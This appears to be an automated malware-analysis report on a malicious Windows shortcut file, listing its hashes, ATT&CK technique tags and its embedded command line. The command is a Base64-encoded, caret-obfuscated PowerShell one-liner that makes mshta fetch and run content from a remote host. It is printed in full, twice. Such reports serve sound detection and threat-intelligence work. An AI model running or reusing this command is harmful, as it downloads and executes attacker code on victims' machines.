Malicious

75f59f9c03b721915c2239610c1b5272

LNK File | MD5: 75f59f9c03b721915c2239610c1b5272 | Size: 2.63 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Characteristics
MD5: 75f59f9c03b721915c2239610c1b5272
Sha1: f82a63e52de3bfa5b1016e65871293e394357d8b
Sha256: 49fcf9080afcb05987918952b9cbdcaf3bdfb369928d6372ca73f3a8e4b54f6f
Sha384: 6b974ea8ec49f3338799ec8606d4b8208d05c16276793b3fd5b0d2c1bd65f76d29af7e3ebdaecb4609fa530acf4b6ad4
Sha512: ef8595a030efb9391384f1042ec2c4b89e0e1b3edb63a8716de1a7e6edc73029e22799037951d098fc82e0a3b6e6022fda70af24ff90e32af84e8db6a11b8e57
SSDeep: 24:8Ayw/BHYVKVWf+/CW+RO0OaTfHgcU0IMJm0sHCEJMdd79dsrab7Z:8y5aXRTt0cU0IMJUiuMdJ9AaZ
TLSH: 2151C3281AF502EAF677CBB9A7F973B24876FB96CD2546BC008023411622510B467E7A
File Structure
75f59f9c03b721915c2239610c1b5272
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA

Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"
